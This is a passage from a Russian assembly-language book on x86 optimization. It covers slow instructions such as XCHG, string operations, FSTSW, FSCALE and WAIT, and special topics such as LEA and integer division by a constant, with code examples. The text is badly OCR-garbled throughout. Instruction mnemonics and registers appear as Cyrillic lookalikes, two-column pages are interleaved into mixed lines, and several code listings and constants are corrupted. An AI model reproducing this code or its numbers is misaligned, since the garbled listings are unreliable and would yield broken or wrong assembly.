но четырем. Тем не менее, ниже приводится пример цикла с инструкциями ХММ. 


МОУ ЕСХ, [М] ; количество элементов 
МОУ ЕЗТ, [Х) ; указатель на Х 

МОУ ОТ, [У] ; указатель на У 

УНЬ ЕСХ, 2 

АО ЕЗТ, ЕСХ ; указывает на конец Х 
АО ЕБТ, ЕСХ ; указывает на конец 1 
МЕС ЕСХ ; -4%*М 

МОУ БАХ, [ТА] ; загружаем БА вне цикла 
ХОВ ЕАХ, ВООО00000Н ; меняем знак БА 

РОЗН ЕАХ 

МОУ55 ХММ1, [Е5Р] ; -ВА 


АО ЕбР, 4 
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ЗНОРР5 ХММ1, ХММ1, 0 ; копируем -РА во все четыре 
; позиции 
СМР ЕСХ, -16 
76 2 
11 МОУАР5 —ХММО, [Е51+ЕСХ] ; 1еп=4 2*р2тЕЗТЕЕСХиХММо 
И ЕСХ, 16 ; 1еп=3 рО1емЕСХУЕ 
ни ХММО, ХММ1 ; 1еп=3 2*ро:хММоОтхммт 
ЕСХ, -16 ; 1еп=3 р0О1гЕСХМЕ 

АРЬР5 ХММО, [ЕБТ+ЕСХ-16} 


} 1еп=5 2*р2уЕОТгЕСХ, 2*р1:хммо 


МОУАРб [Е01+ЕСХ-16], ХММ ; 1еп=5 2*р4ххммО, 2*р3ЕОТЕЕСХ 
9м6 Ь1 ; 1еп=2 р1гЕ 
12: ЧЕСХЬ 4 ; сВеск 1Е Е1п1зЬеа 
МОУАР5 ХММО, [ЕЗТ+ЕСХ] ; 1-3 операции пропущены, 
МОЬР$ ХММО, ХММ1 Голетвем еще четыре 
А00Р5 ХММО, [ЕБВТ+ЕСХ} 
СМР ЕСХ, -8 
96 Ь3 
МОУБР5 [ЕБТ+ЕСХ], ХММО 


; сохраняем е 
о ты: ; р ще два результата 


МОУНЬР5 ХММО, ХММО 
Ъ3: ЗЕСХО Ь4 


у МОУ55 [ЕРТ+ЕСХ], ХММо ; сохраняем еще один результат 


Цикл м занимает 5 — 6 тактов на 4 операции. Инструкции с ЕСХ были помещены до 
и после "МОГР$ ХММО, ХММ!’ чтобы избежать задержки чтения регистра, которую 
‘генерировало бы чтение двух частей регистра ХММ! вместе с ЕЗ[ и ЕГГ в ВАТ. Допол- 


Н . 
ительный код после [.2 отвечает за ситуацию, когда М не делится на 4. Этот код может 


честь несколько байтов за пределами А и В. Это может задержать последнюю опера- 
к если в этих байтах не находились нормализованные числа с плавающей запятой. 
злательно поместить в массив 


о и какие-нибудь дополнительные данные, чтобы сделать 
ичество операций кратным 4 и избавиться от лишнего кода после 12. 


6.26, Проблемные инструкции 


6, 
26.1. ХСНС (все процессоры) 
и . 
о Нструкция 'ХСНО регистр, [память]' с точки зрения получания максимальной про- 
о ительности опасна. По умолчанию эта инструкция имеет неявный префикс ГОСК, 
мен ° дает ей загружаться в кэш. Поэтому выполнение данной инструкции отнимает 
ъ много времени, и ее следует избегать. 


ИЗВ 


15% 
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6.26.2. Вращение через флаг переноса (все процессоры) 


ВСВ и КСИ, сдвигающие аргумент более, чем один бит, медленны, и их следует избегать, 


6.26.3. Строковые инструкции (все процессоры) 


Строковые инструкции без префикса повторения слишком медленны, и их следует 
заменить более простыми инструкциями. То же самое относится к ГООР на всех процес- 
сорах, и к ТЕСХЯ. на Р1 и РММХ. 

Инструкции КЕР МОУЗО и КЕР $ТОЗР относительно быстры, если число повторе- 
ний не слишком мало. Желательно всегда использовать их УМОВ версии и, где это 
возможно, источник и приемник выравнивать на 8 байт. 

Некоторые способы песылки данных оказываются быстрее в определенных условиях 
(подробнее см. пункт разд. 6.27.8.). 

Следует обратить внимание, что пока инструкция КЕР МОУЗ записывает слово 
в приемник, она считывает следующее слово из источника на том же такте. Поэтому 
может конфликт банков кэша, если биты 2 — 4 у этих двух адресов совпадают. Другими 
словами, возникнут неизбежные потери в один такт на итерацию, если ЕЗ[+ (размер сло- 
ва)-ЕП] кратно 32. Самый простой путь избежать конфликтов банков кэша — это исполь- 
зовать версию О\У/ОКР и выравнивать источник и приемник на 8. Инструкции МОУЗВ 
или МОУ$\/ имеют самую низкую скорость выполнения даже в 16-битном. 

ВЕР МОУ$ и ВЕР $ТО$ могут выполняться очень быстро, если перемещать блок 
данных размером в одну строку кэша за раз (РРго, Р2 и РЗ); 


Ш источник и приемник должны быть выравнены на 8; 

должно быть задано направление пересылки «вперед» (очищен флаг направления, 
СГ); 

№ счетчик (ЕСХ) должен иметь значение равное или большее 64; 

й разница между ЕОГ и Е$] должна быть численно больше или равна 32. 


В этих условиях количество мопов будет примерно равно 215+2*ЕСХ для КЕР мМоОУ5В 
и 185+1.5*ЕСХ для ВЕР $ТОЗ, что дает примерную скорость в 5 байтов в такт для обоих 
инструкций, что в три раза больше, в том случае если какое-нибудь из вышеприведенных 
условий не будет соблюдено. 

Версии этой инструкции для байтов и слов также выигрывают от соблюдений данных 
условий, но они менее эффективны, чем версии для двойных слов. 

ВЕР $ТОЗО более оптимальна в одних и тех же условиях, что и ВЕР МОУЗО. 

ВЕР [.ОАГ$, ВЕР $СА$ и ВЕР СМР$ не оптимальны, и их можно заменить на соот 
ветствующие циклы. См. п. 6.25.1.9, 6.25.2.7 и 6.25.2.8 для поиска альтернатив. Инструю 
ции ВЕРМЕ $САЗВ. ВЕР СМР$ могут вызывать конфликты баноков кэша, если биты 2 
одинаковы в ЕЗГ и ЕП}. 





6.26.4. Тестирование битов (все процессоры) 


Инструкции ВТ, ВТС, ВТК и ВТ$ следует заменять инструкциями ТЕЗТ, АХО, ОВ, 


ХОК или сдвига на процессорах Р1 иРММХ. На РРго, Р2 и РЗ битовых тестов операндов 
из памяти следует также избегать. 


6.26.5. Целочисленное умножение (все процессоры) 


Целочисленное умножение занимает до 9 тактов на Р1 и РММХ и до 4 тактов 
на РРго, Р2 и РЗ. Ноэтому часто выгоднее бывает заменить умножение на константу 
на комбинацию других инструкций, таких, как ЗНГ,, АБО, $ ОВ и1ЕА. 

ТМОЬ ЕАХ, 10 


Можно заменить на 


МОУ ЕВХ, БАХ / АОО ЕАХ, БАХ / ЗНЬ ЕВХ, 3 / АБ ЕАХ, ЕВХ 


ТЕА КАХ, [ЕАХ+4*ЕАХ] / АШО ЕАХ, ЕАХ 


Умножение чисел с плавающей запятой выполняется быстрее, чем целочисленное 
умножение на процессорах Р] и РММХ. Но время, затрачиваемое на преобразование 
целых чисел в числа с плавающей запятой и обратно, обычно больше, чем время, сэко- 
номленное в результате использования умножения с плавающей запятой, не считая тех 
случаев, когда количество конвертаций несравнимо с количеством умножений. Умноже- 
ние ММХ достаточно быстро, но доступно только для 16-битных операндов. 


6.26.6. Инструкция УУАПТ (все процессоры) 


р Зачастую можно добиться повышения скорости исполнения пренебрегнув инструкци- 
<й МАТ. Эта инструкция имеет три функции: Ранние сопроцессоры 8086 требовали 
МАТ перед каждой инструкцией с плавающей запятой, чтобы убедиться, что сопроцес- 
сор готов ее получить. 

Если не требуется совместимость с 8087, следует указать ассемблеру, чтобы он не поме- 
Щал \!АТТ, задав опцию генерации кода для более современного процессора. Эмулятор вы- 
Числений с плавающей запятой 8087 также вставляет инструкции \У АТ, поэтому следует 
Указать ассемблеру не генерировать код эмуляции 8087, если это действительно не важно. 


АТ используется для координирования доступа к памяти между модулем вычисле- 
И с плавающей запятой и модулем целочисленных вычислений. 
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вовне оо взора ана ав в оовосовов ООС АВА 
ВЕ ИВЕКО ВОВ х СА 


Примеры 
Р15ТР [пеп32] 
МАТТ ; ждем, пока ЕРО запишет в память, а потом... 
МОУ ЕАХ, [пеп32] ; считываем результат модулем целочисленных вычисления 


ЕТЬО [пеп32] 
МАТТ ; ждем, пока ЕРЦ считает значение из памяти... 
МОУ [пеп32],ЕАХ ; перед ее перезаписью целым числом 


ЕЬО ОМОВО РТК [Е5Р] 
МАТТ ; предотвращаем случайную ошибку от.. 
АОО ЕЗР, 8 ; Перезаписи значения в стеке 


Инструкции \УАПТ для координации доступа к памяти были действительно нужны для 
8087 и 80287, но на Репиит она в этом качестве совершенно не обязательна. Что касается 
80386 и 80486, руководства от | говорят, что \УАГТ необходима для этой цели, не счи- 
тая инструкций ЕМЗТЗ\/ и ЕМТСУ хотя и их пропуск не приводит к ошибкам. Пропуск 
инструкций \АПТ для координирования доступа к памяти не очень надежен даже при на- 
писании 32-битного кода, потому что код может быть выполнен на очень редкой комбина- 
ции 80386 процессора с 287 сопроцессором, который требует \А1Т. 

Чтобы быть уверенным в том, что код будет работать на любом 32-битном процессо- 
ре (включая неинтеловские процессоры), рекомендуется использовать \АПТ в этом 
качестве на всякий случай. 


\УАГТ иногда используется, чтобы следить за исключениями. Оно может генериро- 
вать прерывание, если бит исключения в слове статуса ЕРИ был установлен предыдущей 
операцией плавающей запятой. 

Ассемблер автоматически вставляет \УАТ для этих целей перед следующими инструк- 
циями: ЕСГЕХ, ЕПИТ, ЕЗАУЕ, ЕЗТСУ, ЕЗТЕМУ, ЕЗТУ\/. Можно пропустить \ АПТ перед 
ЕМСЬЕХ и т. п. Тесты показывают, что в большинстве случаев \А[ПТ не нужен, потому что 
эти инструкции без МАТ все равно будут генерировать прерывания или исключения, кро- 
ме ЕМСГЕХ и ЕМП\Т на 80387. (Есть некоторая неопределенность, касаемая того, указы" 
вает ли ВЕТ от прерывания на инструкцию ЕМ или на следующую инструкцию). 

Почти все инструкции с плавающей запятой будут также генерировать прерывание, 
если предыдущая инструкция с плавающей запятой установила бит исключений, поэтому 
исключение рано или поздно будет обнаружено. Можно вставлять \!А1Т после послед” 
ней инструкции с плавающей запятой, чтобы обработать все возникшие исключения. 


6.26.7. ЕСОМ + ЕЗТ$\У/ АХ (все процессоры) 


_ Инструкция ЕМЗТ$\ очень медленна на любых процессорах. У процессоров РРго, Р? 
и РЗ есть инструкции ЕСОМГ, как ее замена. Использование ЕСОМГ вместо обычной 
последовательности 'ЕСОМ / ЕМ5ТЗ\/ АХ / ЗАНЕ' экономит 8 тактов. Поэтому следует 
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использовать ЕСОМТ, чтобы избегать применения ЕМЗТ$\/ везде, где это возможно, 
даже если это будет стоить дополнительного кода. 


На процессорах, у которых отсутствует инструкция ЕСОМ|, обычной практикой 
сравнения значений с плавающей запятой является последовательность: 


РЬО [а] 
РСОМР [Ь] 
ЕТИМ АХ 
ЗАНЕ 


ЧВ Абпа11етТВапВ 


Можно улучшить этот код, использовав ЕМЗТЗ\/ АХ вместо ЕЗТ$\\ АХ и протести- 
ровав АН напрямую, а не используя неспариваемый ЗАНЕ (у ТАЗМ 3.0 есть баг, связан- 
ный с инструкцией ЕМТ$\/ АХ): 

РЬБ [а] 

ЕСОМР [Ъ] 

РМ5ТЗИ АХ 

ЗНВ АН, 1 

ЧС Абта11егТВапВ 


Тестирование на ноль или равенство: 


ЕТЬТ 

ЕМУТМ АХ 

АМО АН, АОН 

9Ч№2 152его ; (Флаг нуля инвертирован!) 


Проверка, больше ли одно значение другого: 
РЬО [а] 
ЕСОМР [Ь] 
ЕМТЗИ АХ 
АМО АН, 41ТН 
347 АбгеакетТВапВ 





Не рекомендуется использование "ГЕЗТ АН,41Н', так как она не спаривается на Р1 
иРММХ. На Р1 и РММХ инструкция ЕМЗТ$\ занимает 2 такта, но она вызывает за- 
держку в дополнительные 4 такта после любой инструкции с плавающей запятой, потому 
Что она ожидает слово статуса ЕРИ. Этого не происходит после целочисленных инструк- 
ций. Можно заполнить промежуток между ЕСОМ и ЕМЗТ$\ целочисленными инструк- 
циями на 4 такта. Спареваемая ЕХСН сразу после ЕСОМ не задерживает ЕМ$Т$\, даже 
сли спаривание несовершенное. | 


РСОМ ; такт 1 

РХСН ; такты 1-2 (несовершенное спаривание} 
ТМС БИОВО РТК [ЕВХ}] ; такты 3-5 

РИТМ АХ ; такты 6-7 
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Здесь можно использовать ЕСОМ вместо ЕТУТ, потому что ЕТЗТ не спаривается, 
Не следует забывать включить М в ЕМ5ТЗ\У.. У ЕЗТУ\ (без №) префикс \АПТ, который 
задержит ее в дальнейшем. 

Иногда быстрее использовать целочисленные инструкции для сравнения значений 
с плавающей запятой, как это объяснено в п. 6.27.6. 


6.26.8. ЕРВЕМ (все процессоры) 


Инструкции ЕРВЕМ и ЕРКЕМ1 медленны на всех процессорах. Их можно заменить 
следующим алгоритмом: умножить на обратное делителю число, получить дробную 
часть, усечь целую, затем умножить на делитель (см. п. 6.27.5, чтобы узнать, как усекать 
значения). 

В некоторых документах говорится о том, что эти инструкции могут давать неполную 
редукцию, и поэтому необходимо повторять инструкции ЕРКЕМ и ЕРКЕМ1, пока она не 
будет получена. 


6.26.9. ЕВМОТУТ (все процессоры) 


Эта инструкция медленна на всех процессорах. Ее можно заменить на: 


Е[5ТР ОМОКО РТК [ТЕМР] 
РГЬО ОМНОВКО РТВ [ТЕМР] 


Этот код быстрее, несмотря на возможные потери из-за попытки считать [ТЕМР], 
когда запись еще не окончена. Здесь рекомендуется поместить какие-нибудь доплни- 
тельные инструкции. 


6.26.10. ЕЗСАГЕ и экпоненциальная функция 
(все процессоры) 


ЕЗСАГЕ медленна на всех процессорах. Вычислить целочисленные степени числа 2 
можно гораздо быстрее, вставив желаемую степень в поле экспоненты числа с плаваю“ 
щей запятой. Вычислить 2№М, где М — целое число со знаком, можно сделать одним и? 
следующих способов. 

Для [М| < 27-1 можно использовать одинарную точность: 


МОУ ЕАХ, [№] 

НЫ ЕАХ, 23 

АО ЕАХ, ЗР8ОООООН 

МОУ ВИОВО РТК [ТЕМР], ЕАХ 
ЕЬО РИО РТВ [ТЕМР] 


ЕО ии. 2 
т 


Для [М| < 210-1 можно использовать двойную точность: 


МОУ ЕАХ, [М] 
ЗНЬ ЕАХ, 20 
АО ЕАХ, ЗЕРОООООН 
МОУ БИОКО РТК [ТЕМР], 0 
МОУ ВИОВО РТВ [ТЕМР+4], ЕАХ 
РЬО ОМОКр РТЕ [ТЕМР] 
Для [М| < 214-1 используя длинную двойную точность: 
МОУ ЕАХ, [М} 
АПР ЕАХ, ООООЗЕРЕН 
МОУ РИОВЬ РТВ [ТЕМР], 0 
МОУ РИОВЬ РТВ [ТЕМР+4], 80000000Н 
МОУ РИОВО РТВ [ТЕМР+8], ЕАХ 
РЫБ ТВУТЕ РТВ [ТЕМР] 


ЕЗСАГЕ часто используется в вычислениях экспоненциальных функций. Следующу 
код показывает экспоненциальную функцию без медленных ЕВМОПМТ и ЕЗСАТЕ: 
; ехсегп "С" опа доцЬ]е _С4ес]1 ехр (9очЬ1е х); 


_ехр РВОС МЕАК 
РОВЬ1С _ехр 
РЬРЬ2Е 
ЕЬО ОМОВО РТВ [Е5Р+4] 5х 
РМОЬ 2 = х*1092 (е) 
Р15Т БМОКО РТВ [Е5Р+4] ; гочпяа (2) 
50В ЕБР, 12 
МОУ БМОВЬ РТК [Е5Р], 0 
ет ВМОВЬ РТК [Е5Р+4], 80000000Н 
РТ5ОВ БМОВЬ РТВ [Е5Р+16} $2 - гоцпа(2} 
МОУ ЕАХ, [Е5Р+16] 
АБВЬ ЕАХ, ЗЕРЕН 
МОУ [Е$Р+8],ЕАХ 
9ЪЕ ЗНОВТ ОМРЕКРЬОИ 
СМР БАХ, ВОООН 
УСбЕ ЗНОВКТ ОУЕВЕГОЙЯ 
РаХМ1 
РЬО1 
РАО ; 2^(2-гоцпа(2}) 
ЕЬО ТВУТЕ РТВ [Е5Р] ; 2^(гоппЯ (2}) 
АО ЕЗР, 12 
ЕМОЬ ; 2^2 = е^х 
ВЕТ 
ОМРЕКРЬОЙ: 
ЕЗТР ЗТ 
Ей 


; гебигип 0 
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и еееининь Ч 
АОО Е5Р, 12 | 
ВЕТ 
ОУЕВЕЬОЙ : 
РОЗН О7ЕВОООООН ; +1111 
ТВ Е ; +11 Еву 
РЬО ВИОВО РТВ [Е5Р} ; геф ] ] 
Ар В 16 ; цей 11101 6у 
ВЕТ 
_ехр ЕМОР 





6.26.11. ЕРТАМ (все процессоры) 


Согласно 

ант, АМ возвращает два значения Х и У и оставляет про- 
на Х для олучения окончательного результата, но фактически она 
ох м можно сэкономить на делении. Тесты показывают, что 
РАМ Воогда во ра. ие! с модулем плавающей запятой или сопроцессором 
отно ат 1 В независимо от аргумента. Если есть желание быть абсо- 
о рены от од удет выполняться корректно на всех процессорах, можно 

‚р и Х одному, что быстрее, чем деление на Х. Значение У может 


быть очень ве 
лико, но не бесконечно, п 
‚ Поэтому не надо тестиров 
ать 
вильное число, если известно, что аргумент верен ы ›болержит ли У пре 


6.26.12. ЕЗОВТ (РЗ) 


Быстрый спо адр 
соб вычислить прибл 
изительное значение 
умножить обратный корень от х на сам х: МоАтритного корня нар? 


ОКТ (х} = х * В5ОВТ(х) 


Инструкция 
о ОКТ дает обратный корень с точностью 12 бит. 
Ч ит, используя формулу Ньютона- 
ванную в интеловской сопроводительной заметке АР-803: афоона, исполь 
х0 = В5ОВТ5$ (а) | 
ь = 0.5 * х0 * {3 - (а*х0)) * хо} 
где х0 — это первое приближение 
к обратному корню 
и рню ота, ах! — шее приближе- 
орядок вычисления имеет значение. Можно использовать э форм и 
ния, чтобы получить квадратный корень. "У Формулу ло умноме 


авео оваЧЬ: 
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6.26.13. МОУ [МЕМ}, АССОМ (Р1 и РММХ) 


Инструкции 'МОУ [тет], АГ’, 'МОУ [тет]. АХ, МОУ [тепт],ЕАХ расцениваются 
механизмом спаривания как пишущие в аккумулятор. Поэтому следующие инструкции 
не спариваются: 


МОУ [пудафта], ЕАХ 


МОУ ЕВХ, ЕАХ 
Эта проблема возникает только в короткой версии инструкции МОХ, у которой нет 
базы или индексного регистра и в которой может быть только аккумулятор в качестве 
источника. Можно избежать проблемы использования другого регистра перегруппиров- 


. кой инструкций, использованием указателя или закодировав общую форму инструкции 


МОУ самостоятельно. 
В 32-битном режиме можно 


образом: 


записать основную форму 'МОУ [тет], ЕАХ’ следующим 


ов 89Н, О5Н 
06 ОРРЗЕТ 05: мем 


В 16-битном режиме можно записать основную форму МОУ [мет], АХ! так: 


рв 89Н, О6Н 
ОМ ОРЕЗЕТ 25: пем 


Чтобы использовать АТ, вместо (Е)АХ, нужно заменить 89Н на 88Н. 
Этот изъян не был исправлен в РММХ. 


6.26.14. Инструкция ТЕ$Т (Р1 и РММХ) 


Инструкция ТЕЗТ с числовым операнлом спаривается только, если назн 


являются А[., АХ или БАХ. 
"ГЕЗТ регистр,регистр' и "ГЕЗТ регистр, память’ всегда спаривается. 


ачением 


спаривается 
спаривается 

не спаривается 
не спаривается 


ТЕЗТ ЕСХ, ЕСХ ; 
ТЕЗТ [пеш], ЕВХ ; 
ТЕЗТ Е0Х, 256 ; 
ТЕЗТ ОМОВО РТК [ЕВХ], 80008; 


Чтобы сделать их спариваемыми, нужно использоватьт один из следующих методов: 
/ ТЕЗТ. ЕАХ, 80001 
МОУ ЕЩХ, [ЕВХ] / АМО ЕОХ,8000Н 
МОУ АБ, [ЕВХ+1] / ТЕЗТ АЪ, ВОН 
МОУ АБ, [ЕВХ+1] / ТЕЗТ АБ,АЬ }; 


МОУ ЕАХ, [ЕВХ] 


(результат в флаге знака) 





Причина этой неспариваемости, вероятно, состоит в том, что первый байт двухбайт. 
ной инструкции такой же, что и для неспариваемых инструкций, и процессор не может 
проверить второй байт во время проверки спариваемости. 


6.26.15. Битовое сканирование (Р1 и РММХ) 


ВЗЕ и ВЗК - наиболее тяжело оптимизируемые инструкции на РГ и РММХ, они 
занимают приблизительно 11+2*п тактов, где п равен количеству пропущенных нулей. 
Следующий код эмулирует ВВ ЕСХ.ЕАХ: 


ТЕСТ ЕАХ, БАХ 

Ул ЗНОВТ В51 

МОУ ОМОВО РТВ [ТЕМР},ЕАХ 

МОУ ОМОВО РТВ [ТЕМР+4],0 

ЕТЬО ОНОВО РТВ [ТЕМР] 

БОТР О\ОКО РТВ [ТЕМР] ° 

МАТТ ; МАТТ требуется только для совместимости со старым 286 
; процессором 

МОУ ЕСХ, ОНОВО РТК [(ТЕМР+4] 

ЗНВ ЕСХ, 20 ; изолируем экспоненту 

ЗОВ ЕСХ, ЗЕРЕН ; снижаем значение 

ТЕСТ БАХ, ЕАХ ; очищаем флаг нуля 


В51: 


Следующий код эмулирует ВЕ ВСХ,ЕАХ: 





ТЕСТ БАХ, ЕАХ 

92 ЗНОВТ В52 “ 
ХОВ ЕСХ, ЕСХ 

МОУ ОИОВЬ РТВ [ТЕМР+4],ЕСХ 

ОВ ЕСХ, БАХ 

АМ БАХ, ЕСХ 

МОУ РИОВО РТВ [ТЕМР],ЕАХ 


ЕТЬЬ ОМОВО РТВ [ТЕМР] 
Е5ТР `ОиОВр РТВ [ТЕМР] 


МАТТ ; МАТТ требуется только для совместимости со старым 286 
; процессором - 

МОУ ЕСХ, ОМОВО РТВ [ТЕМР+4] 

ЗНВ ЕСХ, 20 

ЗОВ ЕСХ, ЗЕРЕН 

ТЕСТ БАХ, ВАХ ; очищаем флаг нуля 


В52: 


Этот код не следует использовать на РРго, Р2 и РЗ, у которых инструкции битового 


сканирования занимают только | или 2 такта и где данный код вызовет около двух заде- 
жек чтения памяти. 
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6.26.16. СУ (РРго, Р2 и РЗ) 


На РРго, Р2 и РЗ инструкция ЕГОСУ\" вызывает серьезную задержку, если за ней 
следует любая инструкция с плавающей запятой, считывающая контрольное слово (как 
делают практически все инструкции плавающей запятой). 

Компиляторы С или С++ часто генерируют множество инструкций ЕГОСУ, потому 
что конвертация чисел с плавающей запятой в целые числа делается с помощью усече- 
ния, в то время как другие инструкции с плавающей запятой используют округление. 
При переводе на ассемблер, можно улучшить код, использовав округление вместо усече- 


- ния, где это возможно, или убрав ЕЕОСУ\ из цикла, если требуется усечение внутри него. 


См. п. 6.27.5, чтобы узнать, как сконвертировать число с плавающей запятой в целое 
без изменения контрольного слова. 


6.27. Специальные темы 


6.27.1. Инструкция Г.ЕА (все процессоры) 


Инструкция ГЕА полезна для самых разных целей, потому что она умеет делать 
сдвиг, два сложения и перемещение за один такт: 


ЪЕА БАХ, [ЕВХ+8*ЕСХ-1000] 
гораздо быстрее, чем 
МОУ БАХ, ЕСХ / ЗН БАХ, 3 / АБО ЕАХ,ЕВХ / 50В ЕАХ, 1000 


Инструкцию ГЕА можно использовать, чтобы делать сложение или сдвиг без изменения 
флагов. Источник и назначение не обязательно должны быть размером в слово, поэтому 
ТЕА БАХ,[ВХ} может стать возможной заменой для 'МОУ7Х ЕАХ,ВХ`', хотя на многих 
процессорах это не совсем оптимально. 

Как бы то ни было, следует знать, что инструкция ГЕА вызывает задержку АС на Р! 
и РММХ, если она использует базовый или индексный регистр, в которой была произве- 
дена запись в предыдущем такте. 

Так как инструкция ГЕА спариваема в У-конвейере на РЁ и РММХ, а инструкции 
сдвига — нет, вы можно использовать Г.ЕБА в качестве замены ЗН1, на 1, 2 или 3 позиции, 
чтобы инструкция выполнялась в \У-конвейере. 

У 32-битных конвейеров нет документированното режима адресации с индексным 
регистром, поэтому инструкция ГЕА ЕАХ[ЕАХ*?2] на самом деле записывается как ТЕА 
ЕАХ[ЕАХ*2-00000000] с 4-байтовым смещением. Можно уменьшить размер инструк- 
ции, написав ТЕА ЕАХ [ЕАХ+ЕАХ]' или, что еще лучше, 'АОО ЕАХ,ЕАХ'. Последний 
вариант не приведет к задержке АС! на РЁ и РММХ. Если случилось так, что есть ре- 
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гистр, равный нулю (например, счетчик цикла после последнего прохода), его МожЖн, Если Ё - целое число, тогда 4 - это степень от 2: переходим к случаю А. 
использовать как базовый регистр, чтобы снизить размер кода: о Если Е - не целое число, тогда проверяем, меньше ли дробная часть Ё 0.5. 
*х - гсли дробная часть Ё < 0.5: переходим к случаю В. 
РЕК ВАХ, ГЕВХ” 4] } 7 байтов Если дробная часть Ё > 0.5: переходим к случаю с. 
ЬЕА ВАХ, [ЕСХ+ЕВХ*4] ; 3 байтов 


случай А: (а = 25) 
результат = х $18 Б 
М случай В: (дробная часть ЕЁ < 0.5} 
округляем ЁЕ вниз до ближайшего целого числа 
6.27.2. Деление (все процессоры) я + © ЗВВ 
случай С: (дробная часть Ё > 0.5) 





Деление отнимает очень много времени. На РРго, Р2 и РЗ целочисленное деление зани. В округляем Е вверх до ближайшего целого числа 
мает, соответственно, 19, 23 или 39 для байта, слова и двойного слова. На Р1 и РММХ без. результат = (х * В) ЗНВ т 
знаковое целочисленное деление занимает приблизительно то же время, хотя деление Пример 
со знаком отнимает не 
ает немного больше времени. Поэтому более предпочтительно использо- рассмотрим деление на 5. 
вать операнды малого размера, которые не вызовут переполнения, даже если это будет сто- 
ить префикса размера операнда, и использовать по возможности беззнаковое деление. 5 = 00000101Ъ. 
6.27.2.1 Ь = (количество значимых двоичных чисел} - 1=2 
.27.2.1. Целочисленное деление на константу (все процессоры). Целочисленное г = 32+2 = 34 
деление на степень двух можно сделать, сдвигая значение вправо. Деление беззнакового Е = 234 / 5 = 3435973836.8 = ОСССССССС. ССС... (Вехадес1та\ ) 
целого числа на 2№: - 
НВ БАХ, М Дробная часть больше, чем половина: используем случай С. Округляем Ё ввер 
Деление целого числа со знаком на 2№: до ОСССССССРЬ. 
со Следующий код делит ЕАХ на 5 и возвращает результат в ЕОХ: 
АМО ЕБХ, (1 5НЬ №) -1 ; или ЗНВ ЕБОХ, 32-М№ бе ЕОХ, ОСССССССОВ 
АО БАХ, ЕОХ МОБ ЕОХ 
ЗАВ БАХ, № . ЗИК ЕОХ, 2 
Альтернативный ЗНВ короче, чем 'АМОТЕМ > 7, но она может попасть только в порт После умножения ЕОХ содержит значение, сдвинутое вправо на 32. Так как г= 3. 
0 (или О-конвейер), в то время как АМО может попасть как в порт 0, так и в порт | нужно сдвинуть еще на 2, чтобы получить окончательный результат. Чтобы поделить + 
(9- или У-конвейер). 10, нужно всего лишь заменить последнюю строку на 'ЗНК ЕОХ,3'. 
Делением на константу можно получить число обратное делению. Чтобы произвести В случае В будет следующее: 
беззнаковое целочисленное деление 4 = х / 4, сначала нужно вычислить число, обратное ТМС БАХ 
делителю, Ё= 2г / 4, где г определяет позицию двоично-десятичной точки (точка основа- МОУ БОХ, Е 
ния системы счисления). Затем нужно умножить х на Ги сдвинуть полученный результат МОЬ ЕОХ 
на г позиций вправо. Максимальное значение г равно 32+Ъ, где Ъ равно числу двоичных НВ ЕОХ,Ь 
цифр в 4 минус 1 (Ъ — это самое большое целое число, для которого 2Ъ <= 4). Для покры- Этот код работает для всех значений х, кроме ОЕЕЕЕЕЕЕЕН, которое дает ноль из- 
тия максильного количества возможных значений делимого х используется г = 32+. ‘ переполнения в инструкции П\С. Если возможно, что х = ОРЕРЕЕЕЕЕН, тогда следу 
Этот метод требует некоторых приемов, чтобы компенсировать ошибки о ‘ления. заменить этот код на: 
в ир круг. 
| | Следующий алгоритм дает верные результаты для деления беззнакового целого чила с усече" МОУ ЕОХ, Е 
Н нием, т. е. тот же результат, что дает инструкция ОГУ (Теце Ма 5еп изобрел этот метод). АБО БАХ, 1 
. _ с РО\ЕВЕЬ 
| Ь = (количество значимых битов в 9} - 1 
| = 32 +ь МО ЕОХ 


—5 
Ш 


2х / & РОУЕВЕЬ: $НВ ЕОХ, Ь 





464 Ассемблер в задачах защиты унформащи 


Если значение х ограничено, следует использовать меньшее значение г, т. е. меньщеь 
количество цифр. Может быть несколько причин для того, чтобы сделать это: 


Ш можно установить г = 32 и избежать 'ЗНК ЕОХ»' в конце; 


Ш можно установить г = 16+6 и использовать инструкции умножения, которые дают 
32-х битный результат, вместо 64-х битного. Тогда можно освободить регистр ЕБХ. 
[МУР ЕАХ,0ОСССРЬ / $НК ЕАХ,18, 


и можно выбрать значение г, которое будет чаще приводить к случаю С, а не В, чтобы 
избежать инструкции 'П\С ЕАХ'. 


Максимальное значение х в этих случаях равно, по крайней мере, 2г-Ъ, иногда больще. 
Нужно проделывать систематические тесты, чтобы узнать точное максимальное значение 
х, при котором код будет работать корректно. 

Можно заменить медленную инструкцию умножения более быстрыми инструкциями, 
как было показаноно в п. 6.26.5. 

Следующий пример делит ЕАХ на 10 и возвращает результат в ЕАХ. Здесь выбрано 
г=17, а не 19, потому что это дает код, который легче оптимизировать, и он покрывает 
такое же количество значений х. = 217 / 10 = 33338, случай В: 4 = (х+1)*3333Ъ: 


ЬБА ЕВХ, [ЕАХ+2*ЕАХ+3 | 
ТЕА ЕСХ, [ЕАХ+2*ЕАХ+3] 
ЗН ЕВХ, 4 

МОУ БАХ, ЕСХ 

нь ЕСХ, 8 

Арр БАХ, ЕВХ 

Е: ЕВХ, 8 

АрО БАХ, ЕСХ 

АБО БАХ, ЕВХ 

НВ БАХ, 17 


Проведенные тесты показывают, Что этот код работает правильно для всех значеиий 
х < 10004Н. 


6.27.2.2. Повторяемое деление целого цисла на одно и то же значение (все процессо- 
ры). Если делитель неизвестен во время ассемблирования программы, но деление осуще" 
ствляется на одно и то же число несколько раз, можно использовать следующий метод: 
код должен определить, с каким случаем (А, В и С) он имеет дело, и вычислить # до 
выполнения операции деления. 

Нижеследующий код показывает, как делать несколько делений на одно и то же чис" 
ло (беззнаковое деление с усечением). Сначала вызывается ЗЕТ_ОГУ$ОК, чтобы уста 
новить делитель и обратное ему число, затем вызывается [ЛУТШЕ _ЕХЕР для каждого 
значения, которое нужно разделить на один и тот же делитель. 


„Часа 
ВЕСТРВОСАТ _ОТУ1508 00 ? 


; округленное число, обратное делителю 
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СОВВЕСТТОМ 0 ? ; случай А: -1, случай В: 1, случай С: 0 
В5НТЕТ р ? ; количество бит в делителе - 1 
‚ соае 
СЕТ_21\1508 РВОС МЕАВ ; делитель в ЕАХ 

РОЗН ЕВХ 
МОУ ЕВХ, ЕАХ 
ВВ ЕСХ, ЕАХ ; Б = количество бит в делителе - 1 
МОУ ЕБХ, 1 
98 ЕВВОК ; ошибка: делитель равен нулю 
ЗНЬ ЕБХ, СЬ ; 2^Ь 
